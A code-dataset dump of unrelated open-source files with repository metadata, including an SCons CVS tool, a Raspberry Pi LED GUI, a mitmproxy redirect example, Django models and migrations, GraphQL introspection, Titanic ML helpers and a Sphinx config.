393a7a059802152c888130c0a117fcc62d4fc8ab
|
[
"BSD-2-Clause",
"MIT"
] | null | null | null |
scons-local-1.1.0/SCons/Tool/CVS.py
|
frew/simpleproto
|
393a7a059802152c888130c0a117fcc62d4fc8ab
|
[
"BSD-2-Clause",
"MIT"
] | null | null | null |
scons-local-1.1.0/SCons/Tool/CVS.py
|
frew/simpleproto
|
393a7a059802152c888130c0a117fcc62d4fc8ab
|
[
"BSD-2-Clause",
"MIT"
] | null | null | null |
"""SCons.Tool.CVS.py
Tool-specific initialization for CVS.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/CVS.py 3603 2008/10/10 05:46:45 scons"
import SCons.Action
import SCons.Builder
import SCons.Util
def generate(env):
"""Add a Builder factory function and construction variables for
CVS to an Environment."""
def CVSFactory(repos, module='', env=env):
""" """
# fail if repos is not an absolute path name?
if module != '':
# Don't use os.path.join() because the name we fetch might
# be across a network and must use POSIX slashes as separators.
module = module + '/'
env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS -d ${TARGET.dir} $CVSMODULE${TARGET.posix}'
act = SCons.Action.Action('$CVSCOM', '$CVSCOMSTR')
return SCons.Builder.Builder(action = act,
env = env,
CVSREPOSITORY = repos,
CVSMODULE = module)
#setattr(env, 'CVS', CVSFactory)
env.CVS = CVSFactory
env['CVS'] = 'cvs'
env['CVSFLAGS'] = SCons.Util.CLVar('-d $CVSREPOSITORY')
env['CVSCOFLAGS'] = SCons.Util.CLVar('')
env['CVSCOM'] = '$CVS $CVSFLAGS co $CVSCOFLAGS ${TARGET.posix}'
def exists(env):
return env.Detect('cvs')
| 38.882353
| 103
| 0.674357
|
f193a4793b5413eef85ecfb9fcbc48939954de51
| 2,449
|
py
|
Python
|
RGB_LED_Control.py
|
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
|
295c58f9a126bf72b03e2d3d59c0747daff6e912
|
[
"MIT"
] | null | null | null |
RGB_LED_Control.py
|
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
|
295c58f9a126bf72b03e2d3d59c0747daff6e912
|
[
"MIT"
] | null | null | null |
RGB_LED_Control.py
|
Linja82/Raspberry-Pi-RGB-LED-Control-w-GUI
|
295c58f9a126bf72b03e2d3d59c0747daff6e912
|
[
"MIT"
] | null | null | null |
from tkinter import *
import RPi.GPIO as GPIO
import time
##### NOTES #####
# The common anode pin connects to the 3.3V rail
# Duty cycle values need to be inverted because the LED is common anode
# Higher duty cycle reduces the voltage difference between the GPIO pin and the 3.3V rail
# Resistors:
# Red: 200 Ω
# Green: 100 Ω
# Blue: 100 Ω
colour_pins = [11, 15, 13] # Red, Green, Blue
def setup(): # Initiates the GPIO pins and pwm
global pwmR, pwmG, pwmB
GPIO.setmode(GPIO.BOARD)
for i in colour_pins: # Sets pin mode and state for all 3 LED pins
GPIO.setup(i, GPIO.OUT)
GPIO.output(i, GPIO.LOW)
pwmR = GPIO.PWM(colour_pins[0], 8000)
pwmG = GPIO.PWM(colour_pins[1], 8000)
pwmB = GPIO.PWM(colour_pins[2], 8000)
pwmR.start(0)
pwmG.start(0)
pwmB.start(0)
def setColour(r_in, g_in, b_in): # 0 ~ 255 values
r = round(((255 - r_in) / 255) * 100)
g = round(((255 - g_in) / 255) * 100)
b = round(((255 - b_in) / 255) * 100)
pwmR.ChangeDutyCycle(r)
print("Red " + str(r) + " / " + str(r_in))
pwmG.ChangeDutyCycle(g)
print("Green " + str(g) + " / " + str(g_in))
pwmB.ChangeDutyCycle(b)
print("Blue " + str(b) + " / " + str(b_in))
print("\n")
def shutdown():
pwmR.stop()
pwmG.stop()
pwmB.stop()
GPIO.cleanup()
window.destroy()
exit()
# Program start
setup()
window = Tk()
window.title("RGB LED Control")
window.geometry("280x360")
# Create the widgets
red_label = Label(window, text="Red")
red_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL)
green_label = Label(window, text="Green")
green_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL)
blue_label = Label(window, text="Blue")
blue_slider = Scale(window, from_=255, to=0, length=300, resolution=1, orient=VERTICAL)
# Place the widgets on a grid
red_label.grid(row=0, column=0, padx=(60, 0))
red_slider.grid(row=1, column=0, padx=(30, 0))
green_label.grid(row=0, column=1, padx=(25, 0))
green_slider.grid(row=1, column=1)
blue_label.grid(row=0, column=2, padx=(26, 0))
blue_slider.grid(row=1, column=2)
leave = Button(window, text="Exit", command = shutdown).grid(row=2, column=1, padx=(30, 0))
LOOP_ACTIVE = True
while LOOP_ACTIVE:
window.update()
# Display colour here
setColour(red_slider.get(), green_slider.get(), blue_slider.get())
time.sleep(0.5)
| 24.989796
| 91
| 0.648428
|
3a3ad300f5b6f7114ca10cd9739e425d90ef1196
| 659
|
py
|
Python
|
examples/redirect_requests.py
|
sebdraven/mitmproxy
|
6a31d3271219dffc9786f08e387ad5dc812fe86c
|
[
"MIT"
] | 2
|
2015-05-10T15:07:44.000Z
|
2016-01-04T21:13:01.000Z
|
examples/redirect_requests.py
|
kmanna/mitmproxy
|
f850bdd8483907b297804ab0f8d07ff1cb456ff5
|
[
"MIT"
] | null | null | null |
examples/redirect_requests.py
|
kmanna/mitmproxy
|
f850bdd8483907b297804ab0f8d07ff1cb456ff5
|
[
"MIT"
] | null | null | null |
from libmproxy.flow import Response
from netlib.odict import ODictCaseless
"""
This example shows two ways to redirect flows to other destinations.
"""
def request(context, flow):
if flow.request.host.endswith("example.com"):
resp = Response(flow.request,
[1,1],
200, "OK",
ODictCaseless([["Content-Type","text/html"]]),
"helloworld",
None)
flow.request.reply(resp)
if flow.request.host.endswith("example.org"):
flow.request.host = "mitmproxy.org"
flow.request.headers["Host"] = ["mitmproxy.org"]
| 32.95
| 70
| 0.561457
|
b2cdb79eaa0e2fb2bd5cf8b32803b2b2e0268f83
| 1,275
|
py
|
Python
|
authors/apps/articles/migrations/0003_auto_20180925_1142.py
|
andela/ah-leagueOfLegends
|
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
|
[
"BSD-3-Clause"
] | null | null | null |
authors/apps/articles/migrations/0003_auto_20180925_1142.py
|
andela/ah-leagueOfLegends
|
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
|
[
"BSD-3-Clause"
] | 43
|
2018-08-27T16:53:58.000Z
|
2022-03-11T23:28:24.000Z
|
authors/apps/articles/migrations/0003_auto_20180925_1142.py
|
andela/ah-leagueOfLegends
|
ebe3a4621a5baf36a9345d4b126ba73dc37acd1f
|
[
"BSD-3-Clause"
] | 2
|
2018-10-30T10:30:35.000Z
|
2018-11-12T07:48:02.000Z
|
# Generated by Django 2.1 on 2018-09-25 11:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('articles', '0002_report'),
]
operations = [
migrations.CreateModel(
name='ArticleRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note', models.TextField()),
('rating', models.IntegerField()),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='articlerating', to='articles.Article')),
('rater', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='articlesrating', to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='articleratings',
name='article',
),
migrations.RemoveField(
model_name='articleratings',
name='rater',
),
migrations.DeleteModel(
name='ArticleRatings',
),
]
| 33.552632
| 150
| 0.607843
|
c7299c637ea4dc17f7beac2b8418db19371ed43a
| 3,021
|
py
|
Python
|
src/graphql/utilities/get_introspection_query.py
|
KingDarBoja/graphql-core
|
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
|
[
"MIT"
] | 1
|
2021-07-27T20:47:34.000Z
|
2021-07-27T20:47:34.000Z
|
src/graphql/utilities/get_introspection_query.py
|
KingDarBoja/graphql-core
|
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
|
[
"MIT"
] | null | null | null |
src/graphql/utilities/get_introspection_query.py
|
KingDarBoja/graphql-core
|
22970e94f1016e813848fc0ab5d1e7ab9ad612e4
|
[
"MIT"
] | null | null | null |
from textwrap import dedent
__all__ = ["get_introspection_query"]
def get_introspection_query(
descriptions: bool = True,
specified_by_url: bool = False,
directive_is_repeatable: bool = False,
schema_description: bool = False,
) -> str:
"""Get a query for introspection.
Optionally, you can exclude descriptions, include specification URLs,
include repeatability of directives, and specify whether to include
the schema description as well.
"""
maybe_description = "description" if descriptions else ""
maybe_specified_by_url = "specifiedByUrl" if specified_by_url else ""
maybe_directive_is_repeatable = "isRepeatable" if directive_is_repeatable else ""
maybe_schema_description = maybe_description if schema_description else ""
return dedent(
f"""
query IntrospectionQuery {{
__schema {{
{maybe_schema_description}
queryType {{ name }}
mutationType {{ name }}
subscriptionType {{ name }}
types {{
...FullType
}}
directives {{
name
{maybe_description}
{maybe_directive_is_repeatable}
locations
args {{
...InputValue
}}
}}
}}
}}
fragment FullType on __Type {{
kind
name
{maybe_description}
{maybe_specified_by_url}
fields(includeDeprecated: true) {{
name
{maybe_description}
args {{
...InputValue
}}
type {{
...TypeRef
}}
isDeprecated
deprecationReason
}}
inputFields {{
...InputValue
}}
interfaces {{
...TypeRef
}}
enumValues(includeDeprecated: true) {{
name
{maybe_description}
isDeprecated
deprecationReason
}}
possibleTypes {{
...TypeRef
}}
}}
fragment InputValue on __InputValue {{
name
{maybe_description}
type {{ ...TypeRef }}
defaultValue
}}
fragment TypeRef on __Type {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
ofType {{
kind
name
}}
}}
}}
}}
}}
}}
}}
}}
"""
)
| 25.175
| 85
| 0.438265
|
6b84f803137196cc212dae9f55083afd5cfec7bd
| 265
|
py
|
Python
|
tests/conftest.py
|
cammeronm/trickster
|
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
cammeronm/trickster
|
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
cammeronm/trickster
|
b7e3d64f2c3b99e986f4fde59a05caa1c7cadac9
|
[
"MIT"
] | null | null | null |
import pytest
from trickster.api_app import ApiApp
from trickster.config import Config
@pytest.fixture
def config():
return Config()
@pytest.fixture
def app(config):
return ApiApp(config)
@pytest.fixture
def client(app):
return app.test_client()
| 13.25
| 36
| 0.743396
|
4ba782ef9203a320ede7c1102479d5729fbaae73
| 7,878
|
py
|
Python
|
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
|
jtiagosg/batch3-students
|
5eb94bee46625881e9470da2b137aaa0f6cf7912
|
[
"MIT"
] | 12
|
2019-07-06T09:06:17.000Z
|
2020-11-13T00:58:42.000Z
|
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
|
jtiagosg/batch3-students
|
5eb94bee46625881e9470da2b137aaa0f6cf7912
|
[
"MIT"
] | 29
|
2019-07-01T14:19:49.000Z
|
2021-03-24T13:29:50.000Z
|
S01 - Bootcamp and Binary Classification/SLU16 - Data Sufficiency and Selection/utils.py
|
jtiagosg/batch3-students
|
5eb94bee46625881e9470da2b137aaa0f6cf7912
|
[
"MIT"
] | 36
|
2019-07-05T15:53:35.000Z
|
2021-07-04T04:18:02.000Z
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import OneHotEncoder, RobustScaler
from sklearn.metrics import accuracy_score
categoricals = [
'PassengerId',
'Name',
'Ticket',
'Sex',
'Cabin',
'Embarked',
]
# Here are a few functions that we will use to do our proof of concepts
# around training and testing for kaggle submissions for the titanic
# competition.
# The reason that we need to have these functions they way they are
# is to manage the preprocessing of the features the same for the
# training and test set. Don't worry too much about exactly what's
# going on in these functions right now but rather focus on the concepts
# that are being covered after this in the notebook.
def read_and_get_dummies(drop_columns=[]):
# when working inside of functions, always call your dataframe
# _df so that you know you're never using any from the outside!
_df = pd.read_csv('data/titanic.csv')
# now drop any columns that are specified as needing to be dropped
for colname in drop_columns:
_df = _df.drop(colname, axis=1)
for colname in categoricals:
if colname in drop_columns:
continue
_df[colname] = _df[colname].fillna('null').astype('category')
# Split the factors and the target
X, y = _df.drop('Survived', axis=1), _df['Survived']
# take special note of this call!
X = pd.get_dummies(X, dummy_na=True).fillna(-1)
return _df, X, y
def encode_categoricals(drop_columns=[]):
# when working inside of functions, always call your dataframe
# _df so that you know you're never using any from the outside!
_df = pd.read_csv('data/titanic.csv')
# now drop any columns that are specified as needing to be dropped
for colname in drop_columns:
_df = _df.drop(colname, axis=1)
for colname in categoricals:
if colname in drop_columns:
continue
_df[colname] = pd.Categorical(_df[colname].fillna('null')).codes
if 'Age' in _df.columns:
_df['Age'] = _df['Age'].fillna(_df['Age'].mean())
# Split the factors and the target
X, y = _df.drop('Survived', axis=1), _df['Survived']
return _df, X, y
def train_and_test(drop_columns=[], max_depth=None, test_size=0.2, encode_cats=False):
"""
Train a decision tree and return the classifier, the X_train,
and the original dataframe so that they can be used on the test
set later on.
"""
if encode_cats:
_df, X, y = encode_categoricals(drop_columns=drop_columns)
else:
_df, X, y = read_and_get_dummies(drop_columns=drop_columns)
# Now let's get our train/test split
X_train, X_test, y_train, y_test = train_test_split(
X, y, random_state=1, test_size=test_size)
clf = DecisionTreeClassifier(max_depth=max_depth, random_state=1)
clf.fit(X_train, y_train)
score = accuracy_score(y_test, clf.predict(X_test))
print('X_test accuracy {}'.format(score))
print('X_train shape: {}'.format(X_train.shape))
return X_train, _df, clf
def train_and_test_logit(drop_columns=[], test_size=0.2):
"""
Train a logistic regressionand return the classifier, the X_train,
and the original dataframe so that they can be used on the test
set later on. Features are scaled with RobustScaler. Does not
create dummies but rather encodes categoricals as integers.
"""
_df, X, y = encode_categoricals(drop_columns=drop_columns)
X = pd.DataFrame(RobustScaler().fit_transform(X), columns=X.columns)
# Now let's get our train/test split
X_train, X_test, y_train, y_test = train_test_split(
X, y, random_state=1, test_size=test_size)
clf = LogisticRegression(random_state=1, solver='lbfgs', penalty='none')
clf.fit(X_train, y_train)
score = accuracy_score(y_test, clf.predict(X_test))
print('X_test accuracy {}'.format(score))
print('X_train shape: {}'.format(X_train.shape))
return X_train, _df, clf
def produce_test_predictions(train_df, clf, drop_columns=[]):
_df = pd.read_csv('data/titanic-test.csv')
for colname in drop_columns:
_df = _df.drop(colname, axis=1)
for colname in categoricals:
if colname in drop_columns:
continue
_df[colname] = _df[colname].fillna('null')
_df[colname] = pd.Categorical(
_df[colname],
categories=train_df[colname].cat.categories
)
X = pd.get_dummies(_df, dummy_na=True).fillna(-1)
return pd.DataFrame({
'PassengerId': pd.read_csv('data/titanic-test.csv').PassengerId,
'Survived': pd.Series(clf.predict(X))
})
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=3,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
"""
Generate a simple plot of the test and training learning curve.
Parameters
----------
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
title : string
Title for the chart.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
ylim : tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- An object to be used as a cross-validation generator.
- An iterable yielding train/test splits.
For integer/None inputs, if ``y`` is binary or multiclass,
:class:`StratifiedKFold` used. If the estimator is not a classifier
or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.
Refer :ref:`User Guide <cross_validation>` for the various
cross-validators that can be used here.
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
"""
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Test Set score")
plt.legend(loc="best")
return plt
# from sklearn import tree
# tree.export_graphviz(clf, out_file='tree.dot', feature_names=X_train.columns)
# ! dot -Tpng tree.dot -o tree.png
| 35.486486
| 86
| 0.675679
|
a448a96869d2205cdfb4cdf8c9b5cdc800e32870
| 1,854
|
py
|
Python
|
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
|
gfzriesgos/shakyground-lfs
|
2caf67cc32e6800286eded2df1efb05973ccf41b
|
[
"BSD-3-Clause"
] | 1
|
2019-08-01T00:28:24.000Z
|
2019-08-01T00:28:24.000Z
|
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
|
gfzriesgos/shakyground-lfs
|
2caf67cc32e6800286eded2df1efb05973ccf41b
|
[
"BSD-3-Clause"
] | 4
|
2018-08-31T14:14:35.000Z
|
2021-10-11T12:53:13.000Z
|
openquake/hazardlib/tests/gsim/pezeshk_2011_test.py
|
gfzriesgos/shakyground-lfs
|
2caf67cc32e6800286eded2df1efb05973ccf41b
|
[
"BSD-3-Clause"
] | 3
|
2018-08-31T14:11:00.000Z
|
2019-07-17T10:06:02.000Z
|
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2018 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.gsim.pezeshk_2011 import (PezeshkEtAl2011,
PezeshkEtAl2011NEHRPBC)
from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase
class Pezeshk2011EtAlTestCase(BaseGSIMTestCase):
GSIM_CLASS = PezeshkEtAl2011
# Test data were obtained from a tool given by the authors
# The data of the values of the mean PGA and SA are in g's.
def test_mean(self):
self.check('PEZE11/PZ11_MEAN.csv',
max_discrep_percentage=0.5)
def test_std_total(self):
self.check('PEZE11/PZ11_STD_TOTAL.csv',
max_discrep_percentage=0.5)
class Pezeshk2011NEHRPBCEtAlTestCase(BaseGSIMTestCase):
GSIM_CLASS = PezeshkEtAl2011NEHRPBC
# Test data generated by adjustment using Atkinson & Boore factors
def test_mean(self):
self.check('PEZE11/PZ11_NEHRPBC_MEAN.csv',
max_discrep_percentage=0.1)
def test_std_total(self):
self.check('PEZE11/PZ11_NEHRPBC_STD_TOTAL.csv',
max_discrep_percentage=0.1)
| 36.352941
| 74
| 0.70658
|
f954302ee30286eefa44a77cf8a43a2be480da2d
| 158
|
py
|
Python
|
src/Python/cvdrun.py
|
apoorva-25/Learning-Git
|
0b2676b18a8198355e6075fae28233cfedd4ee5e
|
[
"MIT"
] | null | null | null |
src/Python/cvdrun.py
|
apoorva-25/Learning-Git
|
0b2676b18a8198355e6075fae28233cfedd4ee5e
|
[
"MIT"
] | 2
|
2020-09-24T11:36:34.000Z
|
2020-09-30T14:17:53.000Z
|
src/Python/cvdrun.py
|
apoorva-25/Learning-Git
|
0b2676b18a8198355e6075fae28233cfedd4ee5e
|
[
"MIT"
] | 5
|
2020-09-21T13:21:08.000Z
|
2021-10-03T17:10:01.000Z
|
t = int(input())
for i in range(t):
a = [int(i) for i in input().split(" ")]
val = (a[0] - a[2] + a[3])%a[1]
if val:
print("NO")
else:
print("YES")
| 15.8
| 41
| 0.487342
|
fe716e5e27839770bfdbce7c010bc27e2ac0cac3
| 767
|
py
|
Python
|
users/models.py
|
Ndundiro/Instagram-Clone
|
db4a73324fe88357894cb5ccc56570127f7cb0df
|
[
"MIT"
] | 1
|
2020-04-27T16:13:53.000Z
|
2020-04-27T16:13:53.000Z
|
users/models.py
|
Ndundiro/Instagram-Clone
|
db4a73324fe88357894cb5ccc56570127f7cb0df
|
[
"MIT"
] | 5
|
2020-06-05T23:42:26.000Z
|
2022-02-10T13:17:46.000Z
|
users/models.py
|
Ndundiro/Instagram-Clone
|
db4a73324fe88357894cb5ccc56570127f7cb0df
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from PIL import Image
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
bio = models.CharField(max_length=250, default="Hey there,am on Insta", blank=True)
image = models.ImageField(default='default.jpg', upload_to='profile_pics')
def save_profile(self):
self.save()
def __str__(self):
return f'{self.user.username} Profile'
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size)
img.save(self.image.path)
| 22.558824
| 87
| 0.647979
|
f30b0011e9a27c1dd89bd7d67f967247038adeb7
| 9,256
|
py
|
Python
|
docs/conf.py
|
mycarta/bruges
|
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
|
[
"Apache-2.0"
] | 209
|
2015-07-16T18:23:42.000Z
|
2022-02-27T02:59:46.000Z
|
docs/conf.py
|
mycarta/bruges
|
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
|
[
"Apache-2.0"
] | 74
|
2015-07-12T16:12:01.000Z
|
2022-02-22T14:27:26.000Z
|
docs/conf.py
|
mycarta/bruges
|
4b7dd42e96d477ffaaedd9134f9f7b7b60dd7123
|
[
"Apache-2.0"
] | 112
|
2015-08-07T14:12:11.000Z
|
2022-02-10T14:12:50.000Z
|
# -*- coding: utf-8 -*-
#
# bruges documentation build configuration file, created by
# sphinx-quickstart on Thu Dec 12 16:14:28 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import re
import sys
import os
import sphinx_rtd_theme
import bruges
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../bruges'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinxcontrib.apidoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
'matplotlib.sphinxext.plot_directive',
]
# Autosummary pages will be generated by sphinx-autogen. Otherwise, the
# imported members won't be documented.
apidoc_module_dir = '../bruges'
apidoc_excluded_paths = ['tests']
apidoc_toc_file = 'api_toc'
apidoc_separate_modules = True
# Matplotlib Plot Directive
plot_include_source = True
plot_pre_code = "import bruges\nimport numpy as np\nimport matplotlib.pyplot as plt\n"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bruges'
copyright = u'2018, Agile Scientific'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
verstr = 'unknown'
VERSIONFILE = "../bruges/_version.py"
with open(VERSIONFILE, "r")as f:
verstrline = f.read().strip()
pattern = re.compile(r"__version__ = ['\"](.*)['\"]")
mo = pattern.search(verstrline)
if mo:
verstr = mo.group(1)
print("Version "+verstr)
else:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
# The short X.Y version.
version = verstr[:3]
# The full version, including alpha/beta/rc tags.
release = verstr
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'brugesdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bruges.tex', u'bruges Documentation',
u'Evan Bianco, Ben Bougher, Matt Hall', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
